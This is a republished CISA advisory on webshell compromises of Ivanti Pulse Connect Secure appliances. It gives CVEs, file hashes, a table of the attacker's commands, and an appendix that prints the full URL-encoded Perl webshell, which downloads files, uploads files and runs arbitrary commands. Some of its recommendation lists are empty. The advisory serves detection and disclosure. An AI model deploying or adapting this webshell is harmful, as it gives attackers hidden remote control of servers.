157-Year-Old Lincoln College Succumbed To A Ransomware Attack
By |
157-Year-Old Lincoln College Succumbed To A Ransomware Attack Read More »
Original release date: April 20, 2021
The Cybersecurity and Infrastructure Security Agency (CISA) is aware of compromises affecting U.S. government agencies, critical infrastructure entities, and other private sector organizations by a cyber threat actor—or actors—beginning in June 2020 or earlier related vulnerabilities in certain Ivanti Pulse Connect Secure products. Since March 31, 2021, CISA assisted multiple entities whose vulnerable Pulse Connect Secure products have been exploited by a cyber threat actor. These entities confirmed the malicious activity after running the Ivanti Integrity Checker Tool. To gain initial access, the threat actor is leveraging multiple vulnerabilities, including CVE-2019-11510, CVE-2020-8260, CVE-2020-8243, and the newly disclosed CVE-2021-22893. The threat actor is using this access to place webshells on the Pulse Connect Secure appliance for further access and persistence. The known webshells allow for a variety of functions, including authentication bypass, multi-factor authentication bypass, password logging, and persistence through patching.
Ivanti has provided a mitigation and is developing a patch. CISA strongly encourages organizations using Ivanti Pulse Connect Secure appliances to immediately run the Ivanti Integrity Checker Tool, update to the latest software version, and investigate for malicious activity.
On March 31, 2021, Ivanti released an Integrity Checker Tool to detect the integrity of Pulse Connect Secure appliances. Their technical bulletin states:
The suspected cyber threat actor modified several legitimate Pulse Secure files on the impacted Pulse Connect Secure appliances. The modifications implemented a variety of webshell functionality:
DSUpgrade.pm MD5
: 4d5b410e1756072a701dfd3722951907
Licenseserverproto.cgi
Licenseserverproto.cgi MD5
: 9b526db005ee8075912ca6572d69a5d6
Secid_canceltoken.cgi MD5
: f2beca612db26d771fe6ed7a87f48a5a
HTTP
requestscompcheckresult.cgi MD5
: ca0175d86049fa7c796ea06b413857a3
ID
argumentLogin.cgi MD5
: 56e2a1566c7989612320f4ef1669e7d5
Healthcheck.cgi MD5:
8c291ad2d50f3845788bc11b2f603b4a
HTTP
requestsOther files were found with additional functionality:
libdsplibs.so MD5
: 416488b6c8a9bdb9c0cb592e36f44677
Many of the threat actor’s early actions are logged in the Unauthenticated Requests Log as seen in the following format, URIs have been redacted to minimize access to webshells that may still be active:
Unauthenticated request url /dana-na/[redacted URI]?id=cat%20/home/webserver/htdocs/dana-na/[redacted URI] came from IP XX.XX.XX.XX.
The threat actor then ran the commands listed in table 1 via the webshell.
Table 1: Commands run via webshell
Time | Command |
---|---|
2021-01-19T07:46:05.000+0000 | pwd |
2021-01-19T07:46:24.000+0000 | cat%20/home/webserver/htdocs/dana-na/[redacted] |
2021-01-19T08:10:13.000+0000 | cat%20/home/webserver/htdocs/dana-na/l[redacted] |
2021-01-19T08:14:18.000+0000 | See Appendix. |
2021-01-19T08:15:11.000+0000 | cat%20/home/webserver/htdocs/dana-na/[redacted] |
2021-01-19T08:15:49.000+0000 | cat%20/home/webserver/htdocs/dana-na/[redacted] |
2021-01-19T09:03:05.000+0000 | cat%20/home/webserver/htdocs/dana-na/[redacted] |
2021-01-19T09:04:47.000+0000 | $mount |
2021-01-19T09:05:13.000+0000 | /bin/mount%20-o%20remount,rw%20/dev/root%20/ |
2021-01-19T09:07:10.000+0000 | $mount |
The cyber threat actor is using exploited devices located on residential IP space—including publicly facing Network Attached Storage (NAS) devices and small home business routers from multiple vendors—to proxy their connection to interact with the webshells they placed on these devices. These devices, which the threat actor is using to proxy the connection, correlate with the country of the victim and allow the actor activity to blend in with normal telework user activity.
Details about lateral movement and post-exploitation are still unknown at this time. CISA will update this alert as this information becomes available.
CISA strongly urges organizations using Pulse Secure devices to immediately:
If the Integrity Checker Tools finds mismatched or unauthorized files, CISA urges organizations to:
In addition to the recommendations above, organizations that find evidence of malicious, suspicious, or anomalous activity or files, should consider the guidance in KB44764 – Customer FAQ: PCS Security Integrity Tool Enhancements, which includes:
After preservation, you can remediate your Pulse Connect Secure appliance by:
CISA recommends performing checks to ensure any infection is remediated, even if the workstation or host has been reimaged. These checks should include running the Ivanti Integrity Checker Tool again after remediation has been taken place.
CISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at
CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA/US-CERT homepage at http://www.us-cert.cisa.gov/.
Unauthenticated request url /dana-na/[redacted]?id=sed%20-i%20%22/main();/cuse%20MIME::Base64;use%20Crypt::RC4;my%20[redacted];sub%20r{my%20$n=$_[0];my%20$rs;for%20(my%20$i=0;$i%3C$n;$i++){my%20$n1=int(rand(256));$rs.=chr($n1);}return%20$rs;}sub%20a{my%20$st=$_[0];my%20$k=r([redacted]);my%20$en%20=%20RC4(%20$k.$ph,%20$st);return%20encode_base64($k.$en);}sub%20b{my%20$s=%20decode_base64($_[0]);%20my%20$l=length($s);my%20$k=%20substr($s,0,[redacted]);my%20$en=substr($s,[redacted],$l-[redacted]);my%20$de%20=%20RC4(%20$k.$ph,%20$en%20);return%20$de;}sub%20c{my%20$fi=CGI::param(%27img%27);my%20$FN=b($fi);my%20$fd;print%20%22Content-type:%20application/x-download\n%22;open(*FILE,%20%22%3C$FN%22%20);while(%3CFILE%3E){$fd=$fd.$_;}close(*FILE);print%20%22Content-Disposition:%20attachment;%20filename=tmp\n\n%22;print%20a($fd);}sub%20d{print%20%22Cache-Control:%20no-cache\n%22;print%20%22Content-type:%20text/html\n\n%22;my%20$fi%20=%20CGI::param(%27cert%27);$fi=b($fi);my%20$pa=CGI::param(%27md5%27);$pa=b($pa);open%20(*outfile,%20%22%3E$pa%22);print%20outfile%20$fi;close%20(*outfile);}sub%20e{print%20%22Cache-Control:%20no-cache\n%22;print%20%22Content-type:%20image/gif\n\n%22;my%20$na=CGI::param(%27name%27);$na=b($na);my%20$rt;if%20(!$na%20or%20$na%20eq%20%22cd%22)%20{$rt=%22Error%20404%22;}else%20{my%20$ot=%22/tmp/1%22;system(%22$na%20%3E/tmp/1%202%3E&1%22);open(*cmd_result,%22%3C$ot%22);while(%3Ccmd_result%3E){$rt=$rt.$_;}close(*cmd_result);unlink%20$ot}%20%20print%20a($rt);}sub%20f{if(CGI::param(%27cert%27)){d();}elsif(CGI::param(%27img%27)%20and%20CGI::param(%27name%27)){c();}elsif(CGI::param(%27name%27)%20and%20CGI::param(%27img%27)%20eq%20%22%22){e();}else{%20%20%20&main();}}if%20($ENV{%27REQUEST_METHOD%27}%20eq%20%22POST%22){%20%20f();}else{&main();%20}%22%20/home/webserver/htdocs/dana-na/[redacted] came from IP XX.XX.XX.XX
This product is provided subject to this Notification and this Privacy & Use policy.
157-Year-Old Lincoln College Succumbed To A Ransomware Attack Read More »
AA22-117A: 2021 Top Routinely Exploited Vulnerabilities Read More »
Can Ransomware Spread Through Business WiFi Networks? Read More »
AA22-110A: Russian State-Sponsored and Criminal Cyber Threats to Critical Infrastructure Read More »